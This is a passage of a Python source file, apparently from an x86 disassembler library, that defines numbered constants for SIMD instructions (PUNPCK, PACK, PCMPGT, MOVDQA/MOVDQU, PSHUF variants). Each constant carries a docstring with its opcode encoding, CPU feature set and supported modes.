``16/32/64-bit``
"""
EVEX_VPUNPCKLWD_ZMM_K1Z_ZMM_ZMMM512: int = 1496
"""
``VPUNPCKLWD zmm1 {k1}{z}, zmm2, zmm3/m512``
``EVEX.512.66.0F.WIG 61 /r``
``AVX512BW``
``16/32/64-bit``
"""
PUNPCKLDQ_MM_MMM32: int = 1497
"""
``PUNPCKLDQ mm, mm/m32``
``NP 0F 62 /r``
``MMX``
``16/32/64-bit``
"""
PUNPCKLDQ_XMM_XMMM128: int = 1498
"""
``PUNPCKLDQ xmm1, xmm2/m128``
``66 0F 62 /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VPUNPCKLDQ_XMM_XMM_XMMM128: int = 1499
"""
``VPUNPCKLDQ xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F.WIG 62 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPUNPCKLDQ_YMM_YMM_YMMM256: int = 1500
"""
``VPUNPCKLDQ ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F.WIG 62 /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPUNPCKLDQ_XMM_K1Z_XMM_XMMM128B32: int = 1501
"""
``VPUNPCKLDQ xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst``
``EVEX.128.66.0F.W0 62 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPUNPCKLDQ_YMM_K1Z_YMM_YMMM256B32: int = 1502
"""
``VPUNPCKLDQ ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst``
``EVEX.256.66.0F.W0 62 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPUNPCKLDQ_ZMM_K1Z_ZMM_ZMMM512B32: int = 1503
"""
``VPUNPCKLDQ zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst``
``EVEX.512.66.0F.W0 62 /r``
``AVX512F``
``16/32/64-bit``
"""
PACKSSWB_MM_MMM64: int = 1504
"""
``PACKSSWB mm1, mm2/m64``
``NP 0F 63 /r``
``MMX``
``16/32/64-bit``
"""
PACKSSWB_XMM_XMMM128: int = 1505
"""
``PACKSSWB xmm1, xmm2/m128``
``66 0F 63 /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VPACKSSWB_XMM_XMM_XMMM128: int = 1506
"""
``VPACKSSWB xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F.WIG 63 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPACKSSWB_YMM_YMM_YMMM256: int = 1507
"""
``VPACKSSWB ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F.WIG 63 /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPACKSSWB_XMM_K1Z_XMM_XMMM128: int = 1508
"""
``VPACKSSWB xmm1 {k1}{z}, xmm2, xmm3/m128``
``EVEX.128.66.0F.WIG 63 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPACKSSWB_YMM_K1Z_YMM_YMMM256: int = 1509
"""
``VPACKSSWB ymm1 {k1}{z}, ymm2, ymm3/m256``
``EVEX.256.66.0F.WIG 63 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPACKSSWB_ZMM_K1Z_ZMM_ZMMM512: int = 1510
"""
``VPACKSSWB zmm1 {k1}{z}, zmm2, zmm3/m512``
``EVEX.512.66.0F.WIG 63 /r``
``AVX512BW``
``16/32/64-bit``
"""
PCMPGTB_MM_MMM64: int = 1511
"""
``PCMPGTB mm, mm/m64``
``NP 0F 64 /r``
``MMX``
``16/32/64-bit``
"""
PCMPGTB_XMM_XMMM128: int = 1512
"""
``PCMPGTB xmm1, xmm2/m128``
``66 0F 64 /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VPCMPGTB_XMM_XMM_XMMM128: int = 1513
"""
``VPCMPGTB xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F.WIG 64 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPCMPGTB_YMM_YMM_YMMM256: int = 1514
"""
``VPCMPGTB ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F.WIG 64 /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPCMPGTB_KR_K1_XMM_XMMM128: int = 1515
"""
``VPCMPGTB k1 {k2}, xmm2, xmm3/m128``
``EVEX.128.66.0F.WIG 64 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPCMPGTB_KR_K1_YMM_YMMM256: int = 1516
"""
``VPCMPGTB k1 {k2}, ymm2, ymm3/m256``
``EVEX.256.66.0F.WIG 64 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPCMPGTB_KR_K1_ZMM_ZMMM512: int = 1517
"""
``VPCMPGTB k1 {k2}, zmm2, zmm3/m512``
``EVEX.512.66.0F.WIG 64 /r``
``AVX512BW``
``16/32/64-bit``
"""
PCMPGTW_MM_MMM64: int = 1518
"""
``PCMPGTW mm, mm/m64``
``NP 0F 65 /r``
``MMX``
``16/32/64-bit``
"""
PCMPGTW_XMM_XMMM128: int = 1519
"""
``PCMPGTW xmm1, xmm2/m128``
``66 0F 65 /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VPCMPGTW_XMM_XMM_XMMM128: int = 1520
"""
``VPCMPGTW xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F.WIG 65 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPCMPGTW_YMM_YMM_YMMM256: int = 1521
"""
``VPCMPGTW ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F.WIG 65 /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPCMPGTW_KR_K1_XMM_XMMM128: int = 1522
"""
``VPCMPGTW k1 {k2}, xmm2, xmm3/m128``
``EVEX.128.66.0F.WIG 65 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPCMPGTW_KR_K1_YMM_YMMM256: int = 1523
"""
``VPCMPGTW k1 {k2}, ymm2, ymm3/m256``
``EVEX.256.66.0F.WIG 65 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPCMPGTW_KR_K1_ZMM_ZMMM512: int = 1524
"""
``VPCMPGTW k1 {k2}, zmm2, zmm3/m512``
``EVEX.512.66.0F.WIG 65 /r``
``AVX512BW``
``16/32/64-bit``
"""
PCMPGTD_MM_MMM64: int = 1525
"""
``PCMPGTD mm, mm/m64``
``NP 0F 66 /r``
``MMX``
``16/32/64-bit``
"""
PCMPGTD_XMM_XMMM128: int = 1526
"""
``PCMPGTD xmm1, xmm2/m128``
``66 0F 66 /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VPCMPGTD_XMM_XMM_XMMM128: int = 1527
"""
``VPCMPGTD xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F.WIG 66 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPCMPGTD_YMM_YMM_YMMM256: int = 1528
"""
``VPCMPGTD ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F.WIG 66 /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPCMPGTD_KR_K1_XMM_XMMM128B32: int = 1529
"""
``VPCMPGTD k1 {k2}, xmm2, xmm3/m128/m32bcst``
``EVEX.128.66.0F.W0 66 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPCMPGTD_KR_K1_YMM_YMMM256B32: int = 1530
"""
``VPCMPGTD k1 {k2}, ymm2, ymm3/m256/m32bcst``
``EVEX.256.66.0F.W0 66 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPCMPGTD_KR_K1_ZMM_ZMMM512B32: int = 1531
"""
``VPCMPGTD k1 {k2}, zmm2, zmm3/m512/m32bcst``
``EVEX.512.66.0F.W0 66 /r``
``AVX512F``
``16/32/64-bit``
"""
PACKUSWB_MM_MMM64: int = 1532
"""
``PACKUSWB mm, mm/m64``
``NP 0F 67 /r``
``MMX``
``16/32/64-bit``
"""
PACKUSWB_XMM_XMMM128: int = 1533
"""
``PACKUSWB xmm1, xmm2/m128``
``66 0F 67 /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VPACKUSWB_XMM_XMM_XMMM128: int = 1534
"""
``VPACKUSWB xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F.WIG 67 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPACKUSWB_YMM_YMM_YMMM256: int = 1535
"""
``VPACKUSWB ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F.WIG 67 /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPACKUSWB_XMM_K1Z_XMM_XMMM128: int = 1536
"""
``VPACKUSWB xmm1 {k1}{z}, xmm2, xmm3/m128``
``EVEX.128.66.0F.WIG 67 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPACKUSWB_YMM_K1Z_YMM_YMMM256: int = 1537
"""
``VPACKUSWB ymm1 {k1}{z}, ymm2, ymm3/m256``
``EVEX.256.66.0F.WIG 67 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPACKUSWB_ZMM_K1Z_ZMM_ZMMM512: int = 1538
"""
``VPACKUSWB zmm1 {k1}{z}, zmm2, zmm3/m512``
``EVEX.512.66.0F.WIG 67 /r``
``AVX512BW``
``16/32/64-bit``
"""
PUNPCKHBW_MM_MMM64: int = 1539
"""
``PUNPCKHBW mm, mm/m64``
``NP 0F 68 /r``
``MMX``
``16/32/64-bit``
"""
PUNPCKHBW_XMM_XMMM128: int = 1540
"""
``PUNPCKHBW xmm1, xmm2/m128``
``66 0F 68 /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VPUNPCKHBW_XMM_XMM_XMMM128: int = 1541
"""
``VPUNPCKHBW xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F.WIG 68 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPUNPCKHBW_YMM_YMM_YMMM256: int = 1542
"""
``VPUNPCKHBW ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F.WIG 68 /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPUNPCKHBW_XMM_K1Z_XMM_XMMM128: int = 1543
"""
``VPUNPCKHBW xmm1 {k1}{z}, xmm2, xmm3/m128``
``EVEX.128.66.0F.WIG 68 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPUNPCKHBW_YMM_K1Z_YMM_YMMM256: int = 1544
"""
``VPUNPCKHBW ymm1 {k1}{z}, ymm2, ymm3/m256``
``EVEX.256.66.0F.WIG 68 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPUNPCKHBW_ZMM_K1Z_ZMM_ZMMM512: int = 1545
"""
``VPUNPCKHBW zmm1 {k1}{z}, zmm2, zmm3/m512``
``EVEX.512.66.0F.WIG 68 /r``
``AVX512BW``
``16/32/64-bit``
"""
PUNPCKHWD_MM_MMM64: int = 1546
"""
``PUNPCKHWD mm, mm/m64``
``NP 0F 69 /r``
``MMX``
``16/32/64-bit``
"""
PUNPCKHWD_XMM_XMMM128: int = 1547
"""
``PUNPCKHWD xmm1, xmm2/m128``
``66 0F 69 /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VPUNPCKHWD_XMM_XMM_XMMM128: int = 1548
"""
``VPUNPCKHWD xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F.WIG 69 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPUNPCKHWD_YMM_YMM_YMMM256: int = 1549
"""
``VPUNPCKHWD ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F.WIG 69 /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPUNPCKHWD_XMM_K1Z_XMM_XMMM128: int = 1550
"""
``VPUNPCKHWD xmm1 {k1}{z}, xmm2, xmm3/m128``
``EVEX.128.66.0F.WIG 69 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPUNPCKHWD_YMM_K1Z_YMM_YMMM256: int = 1551
"""
``VPUNPCKHWD ymm1 {k1}{z}, ymm2, ymm3/m256``
``EVEX.256.66.0F.WIG 69 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPUNPCKHWD_ZMM_K1Z_ZMM_ZMMM512: int = 1552
"""
``VPUNPCKHWD zmm1 {k1}{z}, zmm2, zmm3/m512``
``EVEX.512.66.0F.WIG 69 /r``
``AVX512BW``
``16/32/64-bit``
"""
PUNPCKHDQ_MM_MMM64: int = 1553
"""
``PUNPCKHDQ mm, mm/m64``
``NP 0F 6A /r``
``MMX``
``16/32/64-bit``
"""
PUNPCKHDQ_XMM_XMMM128: int = 1554
"""
``PUNPCKHDQ xmm1, xmm2/m128``
``66 0F 6A /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VPUNPCKHDQ_XMM_XMM_XMMM128: int = 1555
"""
``VPUNPCKHDQ xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F.WIG 6A /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPUNPCKHDQ_YMM_YMM_YMMM256: int = 1556
"""
``VPUNPCKHDQ ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F.WIG 6A /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPUNPCKHDQ_XMM_K1Z_XMM_XMMM128B32: int = 1557
"""
``VPUNPCKHDQ xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst``
``EVEX.128.66.0F.W0 6A /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPUNPCKHDQ_YMM_K1Z_YMM_YMMM256B32: int = 1558
"""
``VPUNPCKHDQ ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst``
``EVEX.256.66.0F.W0 6A /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPUNPCKHDQ_ZMM_K1Z_ZMM_ZMMM512B32: int = 1559
"""
``VPUNPCKHDQ zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst``
``EVEX.512.66.0F.W0 6A /r``
``AVX512F``
``16/32/64-bit``
"""
PACKSSDW_MM_MMM64: int = 1560
"""
``PACKSSDW mm1, mm2/m64``
``NP 0F 6B /r``
``MMX``
``16/32/64-bit``
"""
PACKSSDW_XMM_XMMM128: int = 1561
"""
``PACKSSDW xmm1, xmm2/m128``
``66 0F 6B /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VPACKSSDW_XMM_XMM_XMMM128: int = 1562
"""
``VPACKSSDW xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F.WIG 6B /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPACKSSDW_YMM_YMM_YMMM256: int = 1563
"""
``VPACKSSDW ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F.WIG 6B /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPACKSSDW_XMM_K1Z_XMM_XMMM128B32: int = 1564
"""
``VPACKSSDW xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst``
``EVEX.128.66.0F.W0 6B /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPACKSSDW_YMM_K1Z_YMM_YMMM256B32: int = 1565
"""
``VPACKSSDW ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst``
``EVEX.256.66.0F.W0 6B /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPACKSSDW_ZMM_K1Z_ZMM_ZMMM512B32: int = 1566
"""
``VPACKSSDW zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst``
``EVEX.512.66.0F.W0 6B /r``
``AVX512BW``
``16/32/64-bit``
"""
PUNPCKLQDQ_XMM_XMMM128: int = 1567
"""
``PUNPCKLQDQ xmm1, xmm2/m128``
``66 0F 6C /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VPUNPCKLQDQ_XMM_XMM_XMMM128: int = 1568
"""
``VPUNPCKLQDQ xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F.WIG 6C /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPUNPCKLQDQ_YMM_YMM_YMMM256: int = 1569
"""
``VPUNPCKLQDQ ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F.WIG 6C /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPUNPCKLQDQ_XMM_K1Z_XMM_XMMM128B64: int = 1570
"""
``VPUNPCKLQDQ xmm1 {k1}{z}, xmm2, xmm3/m128/m64bcst``
``EVEX.128.66.0F.W1 6C /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPUNPCKLQDQ_YMM_K1Z_YMM_YMMM256B64: int = 1571
"""
``VPUNPCKLQDQ ymm1 {k1}{z}, ymm2, ymm3/m256/m64bcst``
``EVEX.256.66.0F.W1 6C /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPUNPCKLQDQ_ZMM_K1Z_ZMM_ZMMM512B64: int = 1572
"""
``VPUNPCKLQDQ zmm1 {k1}{z}, zmm2, zmm3/m512/m64bcst``
``EVEX.512.66.0F.W1 6C /r``
``AVX512F``
``16/32/64-bit``
"""
PUNPCKHQDQ_XMM_XMMM128: int = 1573
"""
``PUNPCKHQDQ xmm1, xmm2/m128``
``66 0F 6D /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VPUNPCKHQDQ_XMM_XMM_XMMM128: int = 1574
"""
``VPUNPCKHQDQ xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F.WIG 6D /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPUNPCKHQDQ_YMM_YMM_YMMM256: int = 1575
"""
``VPUNPCKHQDQ ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F.WIG 6D /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPUNPCKHQDQ_XMM_K1Z_XMM_XMMM128B64: int = 1576
"""
``VPUNPCKHQDQ xmm1 {k1}{z}, xmm2, xmm3/m128/m64bcst``
``EVEX.128.66.0F.W1 6D /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPUNPCKHQDQ_YMM_K1Z_YMM_YMMM256B64: int = 1577
"""
``VPUNPCKHQDQ ymm1 {k1}{z}, ymm2, ymm3/m256/m64bcst``
``EVEX.256.66.0F.W1 6D /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPUNPCKHQDQ_ZMM_K1Z_ZMM_ZMMM512B64: int = 1578
"""
``VPUNPCKHQDQ zmm1 {k1}{z}, zmm2, zmm3/m512/m64bcst``
``EVEX.512.66.0F.W1 6D /r``
``AVX512F``
``16/32/64-bit``
"""
MOVD_MM_RM32: int = 1579
"""
``MOVD mm, r/m32``
``NP 0F 6E /r``
``MMX``
``16/32/64-bit``
"""
MOVQ_MM_RM64: int = 1580
"""
``MOVQ mm, r/m64``
``NP o64 0F 6E /r``
``MMX``
``64-bit``
"""
MOVD_XMM_RM32: int = 1581
"""
``MOVD xmm, r/m32``
``66 0F 6E /r``
``SSE2``
``16/32/64-bit``
"""
MOVQ_XMM_RM64: int = 1582
"""
``MOVQ xmm, r/m64``
``66 o64 0F 6E /r``
``SSE2``
``64-bit``
"""
VEX_VMOVD_XMM_RM32: int = 1583
"""
``VMOVD xmm1, r/m32``
``VEX.128.66.0F.W0 6E /r``
``AVX``
``16/32/64-bit``
"""
VEX_VMOVQ_XMM_RM64: int = 1584
"""
``VMOVQ xmm1, r/m64``
``VEX.128.66.0F.W1 6E /r``
``AVX``
``64-bit``
"""
EVEX_VMOVD_XMM_RM32: int = 1585
"""
``VMOVD xmm1, r/m32``
``EVEX.128.66.0F.W0 6E /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VMOVQ_XMM_RM64: int = 1586
"""
``VMOVQ xmm1, r/m64``
``EVEX.128.66.0F.W1 6E /r``
``AVX512F``
``64-bit``
"""
MOVQ_MM_MMM64: int = 1587
"""
``MOVQ mm, mm/m64``
``NP 0F 6F /r``
``MMX``
``16/32/64-bit``
"""
MOVDQA_XMM_XMMM128: int = 1588
"""
``MOVDQA xmm1, xmm2/m128``
``66 0F 6F /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VMOVDQA_XMM_XMMM128: int = 1589
"""
``VMOVDQA xmm1, xmm2/m128``
``VEX.128.66.0F.WIG 6F /r``
``AVX``
``16/32/64-bit``
"""
VEX_VMOVDQA_YMM_YMMM256: int = 1590
"""
``VMOVDQA ymm1, ymm2/m256``
``VEX.256.66.0F.WIG 6F /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VMOVDQA32_XMM_K1Z_XMMM128: int = 1591
"""
``VMOVDQA32 xmm1 {k1}{z}, xmm2/m128``
``EVEX.128.66.0F.W0 6F /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VMOVDQA32_YMM_K1Z_YMMM256: int = 1592
"""
``VMOVDQA32 ymm1 {k1}{z}, ymm2/m256``
``EVEX.256.66.0F.W0 6F /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VMOVDQA32_ZMM_K1Z_ZMMM512: int = 1593
"""
``VMOVDQA32 zmm1 {k1}{z}, zmm2/m512``
``EVEX.512.66.0F.W0 6F /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VMOVDQA64_XMM_K1Z_XMMM128: int = 1594
"""
``VMOVDQA64 xmm1 {k1}{z}, xmm2/m128``
``EVEX.128.66.0F.W1 6F /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VMOVDQA64_YMM_K1Z_YMMM256: int = 1595
"""
``VMOVDQA64 ymm1 {k1}{z}, ymm2/m256``
``EVEX.256.66.0F.W1 6F /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VMOVDQA64_ZMM_K1Z_ZMMM512: int = 1596
"""
``VMOVDQA64 zmm1 {k1}{z}, zmm2/m512``
``EVEX.512.66.0F.W1 6F /r``
``AVX512F``
``16/32/64-bit``
"""
MOVDQU_XMM_XMMM128: int = 1597
"""
``MOVDQU xmm1, xmm2/m128``
``F3 0F 6F /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VMOVDQU_XMM_XMMM128: int = 1598
"""
``VMOVDQU xmm1, xmm2/m128``
``VEX.128.F3.0F.WIG 6F /r``
``AVX``
``16/32/64-bit``
"""
VEX_VMOVDQU_YMM_YMMM256: int = 1599
"""
``VMOVDQU ymm1, ymm2/m256``
``VEX.256.F3.0F.WIG 6F /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VMOVDQU32_XMM_K1Z_XMMM128: int = 1600
"""
``VMOVDQU32 xmm1 {k1}{z}, xmm2/m128``
``EVEX.128.F3.0F.W0 6F /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VMOVDQU32_YMM_K1Z_YMMM256: int = 1601
"""
``VMOVDQU32 ymm1 {k1}{z}, ymm2/m256``
``EVEX.256.F3.0F.W0 6F /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VMOVDQU32_ZMM_K1Z_ZMMM512: int = 1602
"""
``VMOVDQU32 zmm1 {k1}{z}, zmm2/m512``
``EVEX.512.F3.0F.W0 6F /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VMOVDQU64_XMM_K1Z_XMMM128: int = 1603
"""
``VMOVDQU64 xmm1 {k1}{z}, xmm2/m128``
``EVEX.128.F3.0F.W1 6F /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VMOVDQU64_YMM_K1Z_YMMM256: int = 1604
"""
``VMOVDQU64 ymm1 {k1}{z}, ymm2/m256``
``EVEX.256.F3.0F.W1 6F /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VMOVDQU64_ZMM_K1Z_ZMMM512: int = 1605
"""
``VMOVDQU64 zmm1 {k1}{z}, zmm2/m512``
``EVEX.512.F3.0F.W1 6F /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VMOVDQU8_XMM_K1Z_XMMM128: int = 1606
"""
``VMOVDQU8 xmm1 {k1}{z}, xmm2/m128``
``EVEX.128.F2.0F.W0 6F /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VMOVDQU8_YMM_K1Z_YMMM256: int = 1607
"""
``VMOVDQU8 ymm1 {k1}{z}, ymm2/m256``
``EVEX.256.F2.0F.W0 6F /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VMOVDQU8_ZMM_K1Z_ZMMM512: int = 1608
"""
``VMOVDQU8 zmm1 {k1}{z}, zmm2/m512``
``EVEX.512.F2.0F.W0 6F /r``
``AVX512BW``
``16/32/64-bit``
"""
EVEX_VMOVDQU16_XMM_K1Z_XMMM128: int = 1609
"""
``VMOVDQU16 xmm1 {k1}{z}, xmm2/m128``
``EVEX.128.F2.0F.W1 6F /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VMOVDQU16_YMM_K1Z_YMMM256: int = 1610
"""
``VMOVDQU16 ymm1 {k1}{z}, ymm2/m256``
``EVEX.256.F2.0F.W1 6F /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VMOVDQU16_ZMM_K1Z_ZMMM512: int = 1611
"""
``VMOVDQU16 zmm1 {k1}{z}, zmm2/m512``
``EVEX.512.F2.0F.W1 6F /r``
``AVX512BW``
``16/32/64-bit``
"""
PSHUFW_MM_MMM64_IMM8: int = 1612
"""
``PSHUFW mm1, mm2/m64, imm8``
``NP 0F 70 /r ib``
``SSE``
``16/32/64-bit``
"""
PSHUFD_XMM_XMMM128_IMM8: int = 1613
"""
``PSHUFD xmm1, xmm2/m128, imm8``
``66 0F 70 /r ib``
``SSE2``
``16/32/64-bit``
"""
VEX_VPSHUFD_XMM_XMMM128_IMM8: int = 1614
"""
``VPSHUFD xmm1, xmm2/m128, imm8``
``VEX.128.66.0F.WIG 70 /r ib``
``AVX``
``16/32/64-bit``
"""
VEX_VPSHUFD_YMM_YMMM256_IMM8: int = 1615
"""
``VPSHUFD ymm1, ymm2/m256, imm8``
``VEX.256.66.0F.WIG 70 /r ib``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPSHUFD_XMM_K1Z_XMMM128B32_IMM8: int = 1616
"""
``VPSHUFD xmm1 {k1}{z}, xmm2/m128/m32bcst, imm8``
``EVEX.128.66.0F.W0 70 /r ib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPSHUFD_YMM_K1Z_YMMM256B32_IMM8: int = 1617
"""
``VPSHUFD ymm1 {k1}{z}, ymm2/m256/m32bcst, imm8``
``EVEX.256.66.0F.W0 70 /r ib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPSHUFD_ZMM_K1Z_ZMMM512B32_IMM8: int = 1618
"""
``VPSHUFD zmm1 {k1}{z}, zmm2/m512/m32bcst, imm8``
``EVEX.512.66.0F.W0 70 /r ib``
``AVX512F``
``16/32/64-bit``
"""
PSHUFHW_XMM_XMMM128_IMM8: int = 1619
"""
``PSHUFHW xmm1, xmm2/m128, imm8``
``F3 0F 70 /r ib``
``SSE2``
``16/32/64-bit``
"""
VEX_VPSHUFHW_XMM_XMMM128_IMM8: int = 1620
"""
``VPSHUFHW xmm1, xmm2/m128, imm8``
``VEX.128.F3.0F.WIG 70 /r ib``
``AVX``
``16/32/64-bit``
"""
VEX_VPSHUFHW_YMM_YMMM256_IMM8: int = 1621
"""
``VPSHUFHW ymm1, ymm2/m256, imm8``
``VEX.256.F3.0F.WIG 70 /r ib``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPSHUFHW_XMM_K1Z_XMMM128_IMM8: int = 1622
"""
``VPSHUFHW xmm1 {k1}{z}, xmm2/m128, imm8``
``EVEX.128.F3.0F.WIG 70 /r ib``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPSHUFHW_YMM_K1Z_YMMM256_IMM8: int = 1623
"""
``VPSHUFHW ymm1 {k1}{z}, ymm2/m256, imm8``
``EVEX.256.F3.0F.WIG 70 /r ib``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPSHUFHW_ZMM_K1Z_ZMMM512_IMM8: int = 1624
"""
``VPSHUFHW zmm1 {k1}{z}, zmm2/m512, imm8``
``EVEX.512.F3.0F.WIG 70 /r ib``
``AVX512BW``
``16/32/64-bit``
"""
PSHUFLW_XMM_XMMM128_IMM8: int = 1625
"""
``PSHUFLW xmm1, xmm2/m128, imm8``
``F2 0F 70 /r ib``
``SSE2``
``16/32/64-bit``
"""
VEX_VPSHUFLW_XMM_XMMM128_IMM8: int = 1626
"""
``VPSHUFLW xmm1, xmm2/m128, imm8``
``VEX.128.F2.0F.WIG 70 /r ib``
``AVX``
``16/32/64-bit``
"""
VEX_VPSHUFLW_YMM_YMMM256_IMM8: int = 1627
"""
``VPSHUFLW ymm1, ymm2/m256, imm8``
``VEX.256.F2.0F.WIG 70 /r ib``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPSHUFLW_XMM_K1Z_XMMM128_IMM8: int = 1628
"""
``VPSHUFLW xmm1 {k1}{z}, xmm2/m128, imm8``
``EVEX.128.F2.0F.WIG 70 /r ib``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPSHUFLW_YMM_K1Z_YMMM256_IMM8: int = 1629
"""
``VPSHUFLW ymm1 {k1}{z}, ymm2/m256, imm8``
``EVEX.256.F2.0F.WIG 70 /r ib``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPSHUFLW_ZMM_K1Z_ZMMM512_IMM8: int = 1630
"""
``VPSHUFLW zmm1 {k1}{z}, zmm2/m512, imm8``
``EVEX.512.F2.0F.WIG 70 /r ib``
``AVX512BW``
